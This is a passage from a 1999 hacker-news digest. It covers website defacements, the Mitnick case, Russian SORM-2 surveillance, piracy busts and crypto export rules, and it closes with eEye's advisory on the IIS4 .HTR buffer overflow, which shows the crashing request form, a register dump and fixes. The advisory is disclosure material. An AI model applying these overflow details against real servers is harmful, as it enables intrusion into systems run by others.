run=C:\\WINNT\\System32\\Explore.exe Restart Windows NT, then remove the file c:\winnt\system32\Explore.exe - If you’re unsure whether you’ve been infected, Network Associates recommends that you look in your My Documents folder to see whether you’re missing any familiar files, or look in the Sent Messages folder in your e-mail client to see if you are sending replies with attachments that you do not remember sending. Network Associates’ Gullotto warned that if this worm follows the pattern of recent malicious attachments, network administrators and users should be alert to e-mails that are suspicious but do not match exactly the characteristics of Worm.ExploreZip. Variants and copycats of malicious software often appear soon after the original. @HWA 32.0 Senate web site hacked again(!) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ Senate Web Site Attacked, Again! contributed by FedWatcher For the second time in almost as many weeks the official web site of the US Senate has been defaced. A group known The Varna Hacking Group from Bulgaria claimed responsibility. (Mirror provided by attrition.org) Wired http://www.wired.com/news/news/politics/story/20180.html MSNBC http://www.msnbc.com/news/279233.asp AP via Yahoo http://dailynews.yahoo.com/headlines/ap/technology/story.html?s=v/ap/19990611/tc/senate_hackers_1.html HNN Cracked Pages Archive http://www.hackernews.com/archive/crackarch.html Wired; US Senate Cracked Again by Polly Sprenger 4:30 p.m. 11.Jun.99.PDT For the second time in two weeks, crackers on Friday defaced the Web page of the US Senate. The official Senate Web site was down as of Friday afternoon while administrators repaired and restored the network. A cracker replaced the official page with one that said "free Kevin Mitnick, free Zyklon." An employee of US Senate Technical Operations said the site went down around 4 p.m. EST, but couldn't say when the site might come back up. "Those of us who haven't been hacked yet are just trying to lay low and beef up security as we can," said Sean Donelan, a network engineer for Data Research Associates, a nationwide Internet service provider that works with state governments, libraries, and schools. Donelan said that each government agency is having to reinforce security independently and that outside vendors working with the government departments consider their security solutions proprietary. "[We] are also trying not attract attention and not waving a red flag challenging anyone to 'test' our security," Donelan said. The Senate home page was previously cracked on 27 May. In that incident, crackers filled the page with comments critical of the FBI. That hack was claimed by the group Masters of Downloading, who broadcast the message "MAST3RZ 0F D0WNL0ADING, GL0B4L D0MIN8T10N '99!" on the Senate's site. The Varna Hacking Group claimed responsibility for the latest Web vandalism. The organization claims it is a "noncommercial hacking group." Varna is based in Bulgaria, according to reports of a 1998 attack that members claimed to have launched against the Cartoon Network. Zyklon, mentioned in Friday's incident, is alleged to be a 19-year-old hacker from Shoreline, Washington. He was indicted in early May for his alleged involvement in other government site hacks. Many of the recent hacks demanded justice for imprisoned cracker Kevin Mitnick, who has been in jail for more than four years awaiting trial on a broad swath of criminal charges. @HWA 33.0 Mitnick Sentencing Hearing Rescheduled ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ contributed by Macki This weekend Judge Pfaelzer granted Kevin Mitnick's defense a continuance, postponing tomorrow's previously scheduled sentencing hearing until July 12th. This will give the defense time to verify the damage claims which may be upwards of $80 million. Although it is not known for sure some people have speculated that the recent demonstrations (including a recent LA Times article on them) may have influenced Judge Pfaelzer to grant this request. She refused to hear a similar motion just days before the demonstrations. It is interesting to note that July 12th is the Monday after Defcon. FREE KEVIN http://www.kevinmitnick.com/home.html Letters Claiming Damage Amounts http://www.hackernews.com/orig/letters.html 34.0 Russia Looks to Beef Up its Version of Echelon ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ contributed by Merlock Russia has recently leaked a story concerning its version of Echelon (the North American spy network system) called SORM (System for Operational-Investigative Activities). This group has been around for over a year now, but a new development has civil rights leaders in Russia scared. "SORM-2" will require all Russian ISP's to install black-box recording devices at their POPs at the ISP's expense!!! Russian web users have exclaimed that they have been spied on for years, only now they are going to have to pay for it. ABC News http://www.abcnews.go.com/sections/tech/DailyNews/russiansonline990612.html Russians Fight for Net Privacy Christopher Hamilton Special to ABCNEWS.com S T . P E T E R S B U R G , June 11 — In Russia, the Internet and free are words not necessarily found in the same sentence. Russian Internet users continue to struggle against a state security system mired in Soviet-era attitudes toward the free flow of information. The latest outrage: a ministerial act put forward by the Federal Security Service (FSB in its Russian acronym), the successor to the KGB. The act would boost the ability of law enforcement to monitor citizens’ Internet activities. The new act represents an addendum to an existing regulation called SORM — the Russian acronym for System for Operational-Investigative Activities. Currently awaiting approval from the Russian Ministry of Justice, SORM-2 would require Internet service providers to install at their own expense FSB-provided “black boxes” plus a hotline to the FSB. The devices would enable the FSB to monitor and record all electronic communications. Because SORM-2 is a regulation, it requires only approval from the Ministry of Justice, not review by Parliament or President Yeltsin. Existing law already affords the state security apparatus plentiful eavesdropping possibilities once a warrant is issued. SORM-2 would expand those capabilities, making full electronic surveillance as easy as a mouse click for the FSB. ‘Steps Toward Totalitarianism’ News of SORM-2 was leaked late last year on the Moscow Libertarium, a digital-freedom Web site sponsored by the Institute for Commercial Engineering in Moscow. “SORM-2 is a step toward removing the checks and balances between public and the state,” says Anatoly Levenchuk, who operates the Libertarium site. “First they will start investigations without warrants. Then they will decide who is guilty without a trial…These are steps toward totalitarianism.” “The FSB is used to collecting dossiers on citizens just in case,” said Yuri Vdovin of Citizen’s Watch, a St. Petersburg-based human rights organization. “They have been spying on us for years, but now I am going to have to pay for it.” Russian ISPs have already begun to feel the chill. Bayard-Slavia Communications, a Volgograd-based ISP that has repeatedly refused to provide information to the FSB without a warrant, was disconnected from its network provider in mid-May. The state communications agency, Goskomsvyaz, cited “improper formulation” of the company’s contract with the provider, Moscow-Teleport. Company director Nail Murzhanov has assembled a team of prominent activists and lawyers in St. Petersburg and vows to take the matter to court. Eugene Prygoff of Kuban Net, based in Krasnodar, also reports FSB pressure. “Things here in the provinces aren’t like in Moscow and Petersburg. They come and ask for full access to our clients’ e-mail. Sure, we ask for a court order and an explanation, but they have power in the structures that own the ISDN line, so we have to comply.” Turning to Encryption Hoping to prevent invasions of their privacy, many Russian Internet users are turning to encryption. According to Maksim Otstavnov, who maintains the Russian Web site for the encryption program PGP, or Pretty Good Privacy, hits increased about 10-fold after news of SORM-2 was leaked to the public last year. But the official status of cryptography in Russia remains unclear. In 1995, Yeltsin banned the use of PGP and other forms of encryption unless it is licensed and registered with FAPSI, the Russian equivalent of the U.S. National Security Agency. Whether his decree legally applies to private citizens is a matter of debate. The murky state of the law and the lack of public disclosure leaves citizens uninformed about laws that affect them. Citizen’s Watch has held numerous seminars on issues surrounding SORM and computer privacy. “We need to educate people and get them involved,” said Vdovin. Vdovin and Citizen’s Watch are drafting proposals for the State Duma, Russia’s lower house of Parliament, to create a system of checks and balances to rein in the FSB’s domestic spying activities. Meanwhile the shadowy struggle between the security agency and Internet service providers continues. According to Anatoly Levenchuk, “The FSB is already trying to establish ‘volunteer’ agreements similar to SORM-2 with providers. ISPs failing to comply face pressure tactics ranging from repeated visits from tax police to building inspectors threatening to shut them down.” In Russia, the state has always fought for access to its citizens’ private communications, while citizens have fought back as best they could. The battle over Internet privacy could determine who’s winning this ongoing struggle. 35.0 Company Claims CyberAttack by Competitor ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ contributed by Seraphic Artifex Lenox Healthcare Inc. is claiming that its competitor Vencor Inc. engaged in "dead of night computer hacking" according to a lawsuit filed in Los Angeles County Superior Court in California. These actions are allegedly in retaliation for Lenox's cooperation with a government investigation of Vencor. The lawsuit claims, among other things that Vencor broke into Lenox Healthcare's computer system to prevent Lenox from processing medical bills. (It will be interesting to see if these claims can proven in court.) The Berkshire Eagle http://search.newschoice.com/nebe/eagleheadlines/99-06-08_clarkesues08a1.asp Lenox Healthcare suing major nursing home firm Tuesday June 08, 1999 By Ellen G. Lahr Berkshire Eagle Staff PITTSFIELD -- Lenox Healthcare Inc. is suing one of the biggest U.S. nursing home companies, Vencor Inc., for engaging in extortion, death threats and "dead of night" computer hacking, allegedly in retaliation for Lenox's cooperation with a government investigation of Vencor. Vencor Inc., a publicly traded company with more than 300 nursing homes and 60 hospitals around the country, carried out "oppressive, unlawful and often maniacal actions" against Lenox Healthcare, according to a lawsuit filed in Los Angeles County Superior Court in California. The lawsuit also accuses a Vencor company lawyer of "threatening to appear at [Lenox Healthcare's] office with a gun and 'blow away' " Lenox Healthcare President Thomas M. Clarke if Clarke didn't make certain payments to Vencor. Efforts to gain comment from Vencor and its California attorney were unsuccessful yesterday. Both Clarke and his lawyer also declined to comment. $28 million deal Vencor and Lenox Healthcare have been locked in a web of contracts since Lenox Healthcare purchased or leased 30 of Vencor's facilities in 1996 in a $28 million business deal. About half of the facilities purchased or leased are concentrated in California. The lawsuit states that Vencor reneged on millions of dollars allegedly owed to Lenox Healthcare, and fraudulently compelled Clarke to pay $8.7 million for a California nursing facility that was worth far less. Vencor is teetering on the edge of bankruptcy because of an array of regulatory and financial problems, according to financial reports and the company's own annual report. The case also claims that: w After the 1996 business deal was completed, Vencor received millions of dollars in Medicare and Medicaid payments that should have gone to Lenox Healthcare. Vencor eventually turned over some $4 million to Lenox, but has retained nearly $1 million more. w Vencor allegedly broke into Lenox Healthcare's computer system to prevent Lenox Healthcare from processing medical bills, "thereby allowing Vencor to capitalize on the resulting interim financial crisis by extorting" money from Lenox Healthcare. w Vencor allegedly tried to cut off Lenox Healthcare's receipt of pharmaceutical supplies and therapy services "as a means of extorting further monies" from Lenox Healthcare. w The lawsuit also states that Vencor officials spread rumors that Lenox Healthcare was on the verge of bankruptcy, threatened to take over the business and placed Clarke under "extreme duress." w Vencor also is accused of undermining Lenox's efforts to obtain bank financing to offset losses created by Vencor's actions. Lenox claims that the crux of the case involves its cooperation with federal investigators who were probing Vencor's alleged Medicare fraud schemes. After the 1996 deal, Vencor retained contracts with Lenox Healthcare to provide certain rehabilitation services to the nursing home patients. Under the deal, Vencor would provide services such as physical and occupational therapies and then bill the nursing home for the services. The nursing home would bill Medicare and reimburse Vencor when payments were received. According to the suit, Lenox Healthcare discovered that Vencor was "padding its bills" for rehabilitation services. Vencor, the lawsuit says, billed the nursing home for therapeutic services when staff member were actually engaged in marketing and administrative tasks. Other billing fraud was common as well, said the lawsuit. Vencor claims Lenox Healthcare owes $9 million for "therapy services," but Lenox Healthcare believes it owes Vencor nothing, the lawsuit says. The lawsuit claims that Vencor's actions against Lenox Healthcare were motivated "in part by [its] plummeting stock price, a federal investigation of Vencor's discrimination against and eviction of Medicaid patients, and securities fraud allegations." The lawsuit accuses Vencor of carrying out a "vendetta" to seriously injure or financially ruin Lenox Healthcare. According to financial reports, Vencor has been ordered by the federal government to repay $90 million in excessive Medicare reimbursements. The company also was exposed for trying to evict Medicaid patients from its nursing homes to replace them with more lucrative private-paying patients. The lawsuit accuses Vencor of earning "a national reputation for erratic, abusive and vindictive conduct in the operation of its business activities." Lenox Healthcare, a privately owned long-term care company, owns or operates some 100 nursing homes, hospitals and assisted-living facilities around the country. @HWA 36.0 LA set to Allow Internet Voting ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ contributed by Anonymous The Louisiana Republican Party may allow people to vote via computer in the Jan. 29, 2000, presidential caucus. The company VoteHere.Net says its system is one of the toughest to defeat. One has to wonder just how tough it would it be to compromise the client side of the equation with programs like NetBus and Back Orifice floating around? US News and World Report http://www.usnews.com/usnews/issue/990621/internet.htm @HWA 37.0 CCC Camp Shapes Up ~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ contributed by tim The Chaos Communication Camp, scheduled to take place later this summer in Germany is shaping up nicely. There is now a FAQ, registration information and even some weird video stuff. Chaos Communication Camp http://www.ccc.de/camp/ Camp Trailer ftp://ftp.cs.tu-berlin.de/pub/NeXT/video/movies/quicktime/rendezvous_qt2.mov HNN Cons Page http://www.hackernews.com/cons/cons.html @HWA 38.0 Hong Kong Makes Major Piracy Bust ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ contributed by Sinbad Customs officials in Hong Kong have seized $2 million worth of of pirated software, production equipment, and vehicles in what is being called the largest bust of its kind. Officials confiscated 180,000 thousand pirated CDROM titles and arrested seven people. Nando Times http://www.techserver.com/story/body/0,1634,59240-94420-672929-0,00.html Hong Kong Customs seize record number of pirated CD-ROMs Copyright © 1999 Nando Media Copyright © 1999 Associated Press HONG KONG (June 13, 1999 9:53 a.m. EDT http://www.nandotimes.com) - Customs officials seized 180,000 illegal CD-ROMs along with production equipment in the latest raid to stop rampant copyright piracy, the government reported Sunday. Officials seized the record number of computer CD-ROMS, a large quantity of equipment and four vehicles, worth a total of $2 million, during the raid Saturday, a statement from Customs said. Seven people were arrested, but no charges had been filed, it said. Despite frequent raids, Hong Kong remains a center for copyright pirating. Pirated CDs, video CDs and computer software are widely available at shopping arcades and street vendors at a fraction of the cost of a genuine copy. @HWA 39.0 Ernst & Young Profile ~~~~~~~~~~~~~~~~~~~~~ June 14th 1999 From HNN http://www.hackernews.com/ contributed by afghan A nice adverticle for Ernst & Young's Global Securities Solutions Center and its quick response team. Not much 'news' here but a real strong pitch for the 'eXtreme hacking' course offered by the company. It also mentions how great the Palm Pilot is. Kansas City Star http://www.kcstar.com/item/pages/business.pat,business/30db0e56.611,.html Here is a link to PalmVNC that allows you to control an Xserver with a little ol' Palm Pilot as mentioned in the above article. (Not everything is proprietary.) PalmVNC http://www.icsi.berkeley.edu/~minenko/PalmVNC KC Star; Hacker U: Company offers security service, training against computer invaders By DAVID HAYES - The Kansas City Star Date: 06/11/99 22:15 These aren't your father's accountants. There isn't a button-down shirt among these Ernst & Young staffers. Not one of them is toting a calculator or adding machine. And that "generally accepted procedures" thing accounting firms like to talk about? Forget it. In fact, these employees of the Big Five accounting firm get a little testy if you even ask whether they have an accounting background. This is the Ernst & Young nerd squad. They aren't financial accountants looking for weaknesses in their clients' accounts-payable procedures. They're computer analysts looking for holes in their clients' computer security systems and ways to hack into their payroll. It's big business. Ernst & Young has 30 employees in its Global Securities Solutions Center in Kansas City, new headquarters for a national and international computer security operation that has 700 employees worldwide. The operation expects to grow both here and worldwide and take in about $60 million in 1999 -- up from $12 million three years ago. "We see this as being the wave of the future," said Lisa Schlosser, operations leader of eSecurity Solutions for Ernst & Young. The program addresses computer security issues on several fronts -- training information technology employees for clients; examining corporate computer systems for potential holes; and moving in a "quick response team" if a hacker breaks into a client's computer system. The service can be expensive -- $250,000 to more than $1 million, depending on the size of the client and the company's computer system, Schlosser said. Even large corporations with well-protected computer systems are ripe for a digital break-in, said Eric Schultze, a member of the quick-response team and anti-hacking trainer for Ernst & Young. One of the most critical computer break-ins Schultze said he had worked on involved a company that took security very seriously. "They had all types of physical security to get into the building," Schultze said. "But somebody got in and controlled their computer systems. It had been going on for four to five days before they discovered it." When that happens, Ernst & Young sends in its quick-response unit -- a team of three or more hacking experts, including some with law enforcement experience. The team has been called out three times in the last month. As computers have become more prevalent in the workplace, the problem has grown. "With any large corporation you can almost guarantee they've had a security breech somewhere," said George Kurtz, another member of the Ernst & Young team. To reduce the chance of such attacks, Ernst & Young has set up a training program for its employees and for clients. This week, 30 Ernst & Young employees from around the country and from Canada, Great Britain and Denmark attended the computer hacking boot camp at the Kansas City center. The weeklong program, called "eXtreme hacking -- Defending your site," is a $4,000 training course teaching "the greatest hacks out there today," Schultze said. And, of course, those who take the class are taught how to protect security systems from those computer break-ins. "We show them things they never thought were possible," Schultze said. Students in the class learn things like "account cracking," "exploiting reciprocal trust," "hijacking the GUI," and various ways to break into a computer system and find user passwords. On Thursday, Ernst & Young trainers showed fellow employees how a hacker could hijack a client's computer -- even rebooting it remotely -- using a Palm Pilot personal organizer. Ernst & Young has held about 10 classes around the country in the last year, mostly for the company's own employees. Similar classes now are planned at the Kansas City center about once a month, and the program is being opened to clients. Instructors arrive packing a storeroom's worth of boxes with notebook computers, routers, networking equipment, servers and other computer gear. The classroom is set up to simulate various types of corporate computer systems. Schultz said the classes grew out of a computer break-in at a big software company. "We showed the company stuff that amazed them," he said. "They said, `You guys can do that? Can you teach us?' " That's grown into a security practice that includes 23 laboratories across the country, all connected to a lab in Kansas City. The Kansas City lab includes every computer environment the company can think of, so that the latest hacking -- or anti-hacking -- tools can be tested before being deployed to other offices, Schlosser said. The initial two-day course has become a weeklong anti-hacking event with a combination of classroom lectures and hands-on simulations that end with a hacker's version of a capture-the-flag contest. Not just anyone with $4,000 will be able to take the class. "Obviously, we do some screening," Schultze said. The class is for "white hat" hackers -- those who hack to find vulnerabilities in systems, not their "black hat" counterparts who hack to do damage. The Ernst & Young computer security team uses both easily accessible hacking software tools and special programs developed by the company. The team showed students how to hack into a corporate computer using a Palm Pilot and a program called PALM VNC. Using the Palm Pilot's small screen, a hacker could see the hacked computer's desktop, and even when the cursor moved on the screen. "That was a pretty cool hack," said Royce Willis, from Ernst & Young's Chicago office. Kurtz showed the group another hijacking software program, called NetBus, that takes hacking a step further. Once a hacker breaks into a computer and installs NetBus, the program lets the hacker play sounds on the hacked computer, open the computer's CD-ROM drive or turn on a microphone attached to the computer to listen to what's being said in the room, he said. Schultze said VNC, NetBus and dozens of similar programs were created as administrative tools for computer systems administrators. "Any legitimate tool can be used for illegitimate purposes," Schultze said. After taking more than three days of anti-hacking classes and learning that the instructors had secretly put a program on her laptop that logged every letter or number she'd typed, Jenny Dho, from Ernst & Young's Montreal office, said she'd learned a lot. "It worries me for my clients' sake," Dho said. Dave Morgan, who traveled from Ernst & Young's office in Vienna, Va., to take the class, said: "Keeping up with this stuff is a full-time job. "Every day, something new is released into the wild. Hackers are always one step ahead of us." To reach David Hayes, technology writer, call (816) 234-4904 or send e-mail to dhayes@kcstar.com All content © 1999 The Kansas City Star @HWA 40.0 What is Your Privacy Worth? ~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 15th 1999 From HNN http://www.hackernews.com/ contributed by Anonymous Do you know what value your privacy holds? The $2.3 billion marketing information industry sure does but how do you convince a court how much your privacy is worth if you need or want to sue a company for damages? The Electronic Frontier Foundation intends to find out. They have started research into the problem of online identity value to make it easier for people to sue for damages. One factor in the equation will be how much companies charge for information, traditional use of a name for a direct mailing costs around seven cents, but on the Internet, each customer name is worth 15 cents. CAL LAW http://www.callaw.com/stories/edt0614f.html The Electronic Frontier Foundation http://www.eff.org/ CAL LAW; Putting a Price on Our Internet Identities By Renee Deger In more moribund moments, many life insurance policyholders have been known to joke bitterly about how much they'd be worth dead. Unfortunately, they have less of a clue of what they're worth alive, says one longtime plaintiffs lawyer. That's too bad, because marketing and retail companies are making a killing at dealing in the habits and preferences of living people -- information people often simply give away, knowingly or not. That cloud of ignorance is about to clear, and the average person may soon have a better idea of what they're worth as individuals. The San Francisco-based Internet think tank Electronic Frontier Foundation is embarking on an effort to put a price on the average person's identity so that people can sue for damages if their privacy is invaded -- especially their privacy as Web surfers. "An important part for an individual to negotiate with a Web site is the total cost of ownership [of themselves]," says Tara Lemmey, head of EFF. Still in its infancy, the effort to value individualism will be based in large part on how much money companies pay for customer information, and how much companies score for selling it. "How many times is [an individual profile of a] person selling, what's the value each time it's used, at what point does it decay -- that translates to what it's worth to a consumer," Lemmey says. The Internet has already turned the $2.3 billion marketing information industry on its ear. Traditional use of a name for a direct mailing is seven cents, but on the Internet, each customer name is worth 15 cents. Multiply that by millions of names being swapped millions of times. "Traditional list brokers jumped right in," says William Dean, president of San Francisco market researcher W.A. Dean & Associates. "Information on the Internet is worth more because people usually opt in" if they want to get more information or e-mails, Dean adds. Online information is so valuable that one start-up company earlier this year went so far as to offer free Compaq personal computers to anyone willing to be tracked. The computers doled out by FreePC, at www.freepc.com, are worth about $1,000 each, but the company is expected to recoup the money by selling the information it gleans from its "customers." Arnold Laub, a San Francisco plaintiffs attorney, is enticed by the prospects. "It's something that hasn't really been analyzed. If it's done right and the economists get involved, you can make a determination of interest and value," Laub says. "The problem is -- most people don't know the value of their identity," he says. Other factors of a human life have already been probed in detail, however. In personal injury and wrongful death claims, lawyers already can refer to actuarial tables and economic formulas to value lost livelihood. And in claims involving famous people who have already sold their likeness or their creations, lawyers can refer to prior contract terms. Whether the EFF's effort produces the same kinds of wallet-card-type dollar values on death and lost wages that plaintiffs lawyers utilize is still up in the air, however. Lemmey says the foundation's in-house lawyers have just begun to kick around the idea and are hoping to come up with a model to support broader debates. She says they want people to become more conscious of the value they add to commercial enterprises, and how much they can demand from a company that doesn't keep its promises. "If a company claims it's for one-time use or internal purposes only or sells it, what are the damages?" asks Lemmey. "No one knows." @HWA 41.0 BSA Tactics Condemned by UK ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 15th 1999 From HNN http://www.hackernews.com/ contributed by Warez Dude The Birmingham Chamber of Commerce and Industry, and the Advertising Standards Authority in England have condemned the practices of the Business Software Alliance. The two groups claim that recent tactics used by the BSA in its 'Crackdown 99' campaign are misleading and overly threatening. Wired http://www.wired.com/news/news/politics/story/20217.htm (url unavailable June 24th - Ed) @HWA 42.0 US Allows 128bit SSL Into Japan ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 15th 1999 From HNN http://www.hackernews.com/ contributed by secret Recent changes in the crypto export law have left open a small loophole that allows 128 SSL encryption out of the country. The recent export deregulation covered "online merchants," or electronic shops, if a user goes directly to VeriSign in the United States, it is possible to obtain a digital ID for 128-bit encryption at electronic shops in Japan. Asia Biz Tech http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID=onair/asabt/moren/73414 U.S. Export Loophole Allows 128-bit SSL Encryption to Be Used by Japanese Electronics Shops June 10, 1999 (TOKYO) -- A loophole in U.S. export restrictions of 128-bit Secure Socket Layer encryption is allowing Japanese electronics shops to adopt the stringent security method. It was found that the digital ID for the server that enables 128-bit encryption can be easily obtained at electronic shops.

SSL is a mechanism of encrypted communications between Web browsers and servers. In Japan, 40-bit SSL encryption is normally used. The 128-bit SSL encryption is far more secure at 10 to the 26th power.

Due to export restrictions imposed by the United States, the use of 128-bit encryption in Japan was not permitted until December 1998, when the United States partially deregulated 128-bit encryption exports and allowed their use in financial institutions and the health care industry.

Responding to this export deregulation of the U.S. government, VeriSign Inc. of the United States began to offer the service to provide Digital Authentication IDs for 128-bit SSL encryption for overseas countries, including Japan. This service is called www.verisign.com and it began in April 1999 in Japan. The recent export deregulation covered "online merchants," or electronic shops, but VeriSign Japan KK did not intend to provide such general shops with digital IDs for 128-bit encryption because of safety considerations. Its was found, however, that if a user goes directly to VeriSign in the United States, it is possible to obtain a digital ID for 128-bit encryption at electronic shops in Japan. Therefore, a highly secure SSL can be used in Japan as well as in the United States, unless these electronic shops sell drugs and materials considered to be used as weapons. (Nikkei Multimedia) @HWA 43.0 Terroist About to Cause Electronic Chaos ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 15th 1999 From HNN http://www.hackernews.com/ contributed by Weld Pond Massive FUD (Fear, Uncertainty, and Doubt) in this article. We might as well just give up because the world will end tomorrow. Terrorists roaming the internet about to cause massive chaos around the globe. The threat of electronic terrorism is looming larger and larger each day. The Jerusalem Post Monday, June 14, 1999 30 Sivan 5759 Updated Mon., Jun. 14 08:52 Computer terror can't be ignored By YONAH ALEXANDER (June 14) - The latest "Melissa" virus, which spreads via infected e-mail, and the upsurge of computer intrusion by hackers into the Web sites of the White House, Senate, and the FBI, have once again focused attention on cyber-crime and its ominous international security implications. It should be recalled that in February 1998, Ehud Tenenbaum, an Israeli hacker also known as "The Analyzer," worked with two young collaborators from California to mount cyber-attacks against the Pentagon's systems, a nuclear weapons research lab and other significant targets. The prevailing assessment of intelligence agencies, strategic thinkers, and scientists is that not only hackers and "crackers" (criminal hackers) but also terrorists - individuals, groups, and state sponsors - are likely to exploit the vulnerability of the world's computer systems to conduct electronic warfare. It is estimated, for instance, that hostile perpetrators, with a budget of around $10 million and a team of some 30 computer experts strategically placed around the globe, could bring the US to its knees. The threat of electronic terrorist assaults grows with each passing day. There are three reasons for this: * The globalization of the Internet. Internet users currently number over 120 million; an estimated 1 billion people will be using it by the year 2005. This makes efforts to control Internet attacks a daunting challenge to intelligence services and law-enforcement agencies. * There are now some 30,000 hacker-oriented sites on the Internet, making the tools of disruption and destruction available to almost anyone. The easily available recipes for these new weapons - worms, Trojan horses, and logic bombs, among others - are making this form of warfare a permanent fixture of international life. * With the Cold War now behind us, terrorist organizations have cast off the limitations and ideologies of the formerly bipolar world and have become multidirectional. These new political realities, coupled with easily accessible cyber-weapons, have enhanced the threats posed by terror groups to the degree that they could alter life on our planet forever. The Internet already serves as an arena for propaganda and psychological warfare. Ideological extremists such as neo-Nazi groups have called for ethnic, racial, and religious violence. Traditional terrorist organizations, like Hizbullah, which is supported by Iran and Syria, maintains on its Web site a daily record of "heroic" battles of its fighters in southern Lebanon. And Afghanistan, the newest state sponsor of terrorism, pushes its radical brand of Islam on-line. Terrorists have also used their laptops to store operation plans. Ramzi Ahmed Yusuf, who is serving a life sentence the 1993 World Trade Center bombing in New York and other terrorist crimes, used his computer to develop a plot to blow up some dozen American airliners over the Pacific. And terror networks, such as the underground infrastructure of Osama bin Laden, who has been implicated in the US embassy bombings in Kenya and Tanzania last summer, are sustained via personal computers with satellite uplinks and encrypted messages. Is the worst yet to come? Consider waking one morning to the news that a group of terrorists employing electronic "sniffers" have sabotaged the global financial system by disrupting international fund-transfer networks, causing an unprecedented stocks plunge on the New York, London, and Tokyo exchanges. Clearly, there are numerous other devastating scenarios, including altering formulas for medication at pharmaceutical plants; "crashing" telephone systems; misrouting passenger trains; changing pressure in gas pipelines to cause valve failure; disrupting operations of air-traffic control towers; triggering oil refinery explosions and fires; scrambling the software used by emergency services; turning off power grids; and simultaneously detonating hundreds of computerized bombs around the world. In sum, this new medium of communication, command and control, supplemented by the repeated destructive keyboard attacks on civilian and military nerve centers that we have already seen, forces us to think the unthinkable - and take action to prevent it. If the expanding electronic perils are ignored by the international community, it is likely that the 21st century could produce a global Waterloo for civilization. (The writer is a professor and the director of the Inter-University Center for Terrorism Studies - Israel and the United States.) @HWA 44.0 Major Remote Hole Found in IIS ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 16th 1999 From HNN http://www.hackernews.com/ contributed by Marc eEye Digital Security Team has found a major remotely exploitable hole in Microsoft's Internet Information Server. The buffer overflow of ISM.dll leaves approximately 90% of 1.3 million Microsoft web servers vulnerable to internet attack. The folks at eEye have graciously developed an exploit script to demonstrate this hole. Microsoft has provided a work around and is working on a patch. eEye Digital Security Team http://www.eeye.com/database/advisories/ad06081999/ad06081999.html Wired http://www.wired.com/news/news/technology/story/20231.html Microsoft http://www.microsoft.com/security/bulletins/ms99-019.asp eEye; Retina vs. IIS4, Round 2 Systems Affected: Internet Information Server 4.0 (IIS4) Microsoft Windows NT 4.0 SP3 Option Pack 4 Microsoft Windows NT 4.0 SP4 Option Pack 4 Microsoft Windows NT 4.0 SP5 Option Pack 4 Release Date: June 8, 1999 Advisory Code: AD06081999 Description: We have been debating how to start out this advisory. How do you explain that 90% or so of the Windows NT web servers on the Internet are open to a hole that lets an attacker execute arbitrary code on the remote web server? So the story starts... The Goal: Find a buffer overflow that will affect 90% of the Windows NT web servers on the Internet. Exploit this buffer overflow. The Theory: There will be overflows in at least one of the default IIS filtered extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit will take place is that IIS will pass the full URL to the DLL that handles the extension. Therefore if the ISAPI DLL does not do proper bounds checking it will overflow a buffer taking IIS (inetinfo.exe) with it and allow us to execute arbitrary code on the remote server. Entrance Retina: At the same time of working on this advisory we have been working on the AI mining logic for Retina's HTTP module. What better test scenario than this? We gave Retina a list of 10 or so extensions common to IIS and instructed it to find any possible holes relating to these extensions. The Grind: After about an hour Retina found what appeared to be a hole. It displayed that after sending "GET /[overflow].htr HTTP/1.0" it had crashed the server. We all crossed our fingers, started up the good ol' debugger and had Retina hit the server again. Note: [overflow] is 3k or so characters... but we will not get into the string lengths and such here. View the debug info and have a look for yourself. The Registers: EAX = 00F7FCC8 EBX = 00F41130 ECX = 41414141 EDX = 77F9485A ESI = 00F7FCC0 EDI = 00F7FCC0 EIP = 41414141 ESP = 00F4106C EBP = 00F4108C EFL = 00000246 Note: Retina was using "A" (0x41 in hex) for the character to overflow with. If you're not familiar with buffer overflows a quick note would be that getting our bytes into any of the registers is a good sign, and directly into EIP makes it even easier :) Explain This: The overflow is in relation to the .HTR extensions. IIS includes the capability to allow Windows NT users to change their password via the web directory /iisadmpwd/. This feature is implemented as a set of .HTR files and the ISAPI extension file ISM.DLL. So somewhere along the line when the URL is passed through to ISM.DLL, proper bounds checking is not done and our overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed by default on IIS4 servers. Looks like we got our 90% of the Windows NT web servers part down. However can we exploit this? The Exploit: Yes. We can definitely exploit this and we have. We will not go into much detail here about how the buffer is exploited and such. However, one nice thing to note is that the exploit has been crafted in such a way to work on SP4 and SP5 machines, therefore there is no guessing of offsets and possible accidental crashing of the remote server. Click here for more details about the exploit and the code. The Fallout: Almost 90% of the Windows NT web servers on the Internet are affected by this hole. Even a server that's locked in a guarded room behind a Cisco Pix can be broken into with this hole. This is a reminder to all software vendors that testing for common security holes in your software is a must. Demand more from your software vendors. The Request. (Well one anyway.) Dear Microsoft, One of the things that we found out is that IIS did not log any trace of our attempted hack. We recommend that you pass all server requests to the logging service before passing it to any ISAPI filters etc...The logging service should be, as named, an actual service running in a separate memory space so that when inetinfo goes down intrusion signatures are still logged. Retina vs. IIS4, Round 2. KO. Fixes: 1.Remove the extension .HTR from the ISAPI DLL list. Microsoft has just updated their checklist to include this interim fix. 2.Apply the patch supplied by Microsoft when available. Vendor Status: We contacted Microsoft on June 8th 1999, eEye Digital Security Team provided all information needed to reproduce the exploit. and how to fix it. Microsoft security team did confirm the exploit and are releasing a patch for IIS. Related Links Retina - The Network Security Scanner http://www.eEye.com/retina/ Retina - Brain File used 